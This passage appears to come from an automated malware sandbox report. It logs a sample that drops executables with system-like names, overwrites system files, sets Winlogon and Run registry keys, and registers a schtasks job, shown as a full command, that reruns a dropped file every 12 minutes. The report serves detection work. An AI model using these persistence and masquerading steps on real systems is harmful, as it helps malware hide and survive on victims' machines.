                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops PE files with benign system names
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJump to dropped file
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\xxMkqOtN.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\sTRlxExW.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\CAgBdTQY.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\myawJPbK.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\fuHfGerv.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\RuntimeBroker.exeJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\gwaXxxDZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\MjzRNvWG.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\cPGganVc.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\VTXhBlNT.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\VLoPWCmN.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\RuntimeBroker.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\xxMkqOtN.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\VTXhBlNT.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\sTRlxExW.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\fuHfGerv.logJump to dropped file
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\VLoPWCmN.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\gwaXxxDZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\MjzRNvWG.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\CAgBdTQY.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\myawJPbK.logJump to dropped file
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile created: C:\Users\user\Desktop\cPGganVc.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2ZqlJump to behavior
                              Drops PE files to the user root directory
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\RuntimeBroker.exeJump to dropped file
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2ZqlJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2ZqlJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2ZqlJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2ZqlJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbYJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
